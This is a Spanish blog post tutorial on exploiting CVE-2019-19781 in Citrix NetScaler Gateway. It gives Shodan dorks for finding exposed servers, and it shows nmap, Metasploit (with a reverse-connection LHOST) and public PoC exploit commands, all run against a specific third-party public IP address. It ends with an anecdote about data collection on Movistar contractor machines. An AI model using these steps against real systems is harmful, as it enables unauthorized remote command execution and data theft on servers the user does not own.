domingo, 26 de enero de 2020

Explotando CVE-2019-19781 - Citrix Netscaler Gateway


Hola fieles lectores en esta oportunidad les enseñare a encontrar vulnerabilidades en los servicios de Citrix Netscaler Gateway y posteriormente elaborar pruebas de pentesting.

Citrix Netscaler Gateway

Es una aplicacion de acceso de datos seguro para los administradores mediante mecanismos de identificacion y autentificacion.

Este servicio cuenta con servicios de seguridad DMZ, IDS y un tipo de certificado criptografico PKCS que usa para agrupar una clave privada con su certificado X.509 o para agrupar a todos los miembros de una cadena de confianza y poder ejecutar los aplicativos de una organización mediante la conectividad VPN.



Versiones vulnerables:

10.5, 11.1, 12.0, 12.1, y 13.0

Consecuencia:

Ejecución de comandos remotamente.

  • /vpns/
  • /vpn/../vpns/cfg/smb.conf
  • /vpn/../vpns/portal/scripts/newbm.pl

El ataque tuvo un imparto de más de 80 000 mil empresas vulneradas a nivel mundial.

más información:
https://support.citrix.com/article/CTX267027

Encontrando servidores citrix vulnerables

Shodan es un buen aliado para encontrar servicios vulnerables de todo tipo, desde diciembre incorporo el escaneo de vulnerabilidades CVE-2019-19781.
Dorks:

title:"Netscaler" country:"IT"
title:"Netscaler" port:"443"

Si deseas aprender SHODAN, puedes entrar a los siguientes articulos.
https://www.backtrack-omar.com/2015/02/shodan-el-buscador-del-informatico-de.html
https://www.backtrack-omar.com/2016/11/pentesting-con-shodan-exploits.html




https://www.shodan.io/host/92.246.226.211


Nmap - El escaner de redes más potente y utilizado del mundo no se podría quedar atrás, ya cuenta con un modulo (Script) para detectar la vulnerabilidad CVE-2019-19781.
https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse

Si deseas aprender a utilizar NMAP y Masscan para un escaneo masivo te invito a leer los siguientes articulos.
https://www.backtrack-omar.com/2014/04/aprendiendo-nmap-nivel-basico.html
https://www.backtrack-omar.com/2015/10/comprometiendo-sistemas-nivel-mundial.html
root@kali:/usr/share/nmap# nmap --script CVE-2019-19781.nse -Pn -v 92.246.226.211 -p 433



Metasploit Framework nuestro framework de pentesting preferido también incorporo su escaner de vulnerabilidades correspondiente.

Configuración de opciones:

msf5 > use exploit/linux/http/citrix_dir_traversal_rce
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set RHOSTS 92.246.226.211
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set RPORT 433
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set SSL yes
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set lhost 192.168.0.150
msf5 exploit(linux/http/citrix_dir_traversal_rce) > run

Resultado:

PoC

Exploit:
https://github.com/projectzeroindia/CVE-2019-19781/blob/master/CVE-2019-19781.sh
root@kali:~/Exploits/CVE-2019-19781# bash CVE-2019-19781.sh 92.246.226.211 ls

Este exploit nos permite ejecutar comandos de manera remota en el servidor, no obstante debemos tener en cuenta de modificar los permisos y peticiones de nuestros archivos de configuración de citrix para denegar peticiones maliciosas.
Citrix ya publico la manera de fixear esta vulnerabilidad:

Experiencia propia como consultar de seguridad informatica.


Hacemos 3 años trabaje en un Call center de una empresa tercerista de Movistar  y a lo largo de este proceso encontré muchas debilidades pero solo mencionare lo referente a CITRIX

Citrix: Servicio de VPN privado a la red Movistar

ATIS: Es el aplicativo de consultas que brinda el servicio de telefónica, para obtener la información de los clientes en cuanto a sus servicios de cable, telefonía e internet.

Observación: como encargado del área de sistemas, se deben cumplir algunos requisitos de instalaciones y licencias en las maquinas para que estas puedan ser actas para contratar el servicio de instalación, entre ellos los datos del trabajador se recopilan de igual manera.

Antes de generarse el contrato correspondiente, se ejecutan 2 herramientas en la maquina donde se instalo el software de telefónica.

Estas recopilan las informaciones correspondientes:

Importante: Las estaciones de trabajo no deben tener instalado en ningún momento software no permitido, tales como: programas de acceso remoto.  Se realiza verificación en estaciones configuradas.

Cabe aclarar que esas informaciones correspondientes la guardan en su NUBE, sin avisar o establecerlo en el contrato.

Estos datos se pueden obtener en un archivo temporal que se crea en un documento de texto y es enviando al servidor central, al igual que perifericos, versión de componentes de hardware y demas datos computacionales del dispositivo que se ejecutara la instalación.

Las firmas electrónicas hoy en día son esenciales para autentificar y validad los accesos a sitios con restricción de certificado, por otra parte, la criptografía juega un papel importante para proteger la comunicación y el cifrado del documento en si, por otra parte, cumple un estándar de calidad ligado a la seguridad de la información.

Este último nos permitirá una comunicación privada flexible a un servidor dedicado, para ello movistar registra los siguientes datos donde se instaló el software.
Panel de las aplicaciones de Telefonica
Moraleja si esa vulnerabilidad CVE-2019-19781 hubiera alcanzado las empresas con datos de millones de personas, la fuga de información hubiese sido tremenda!

Saludos.

0 comentarios:

Publicar un comentario

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares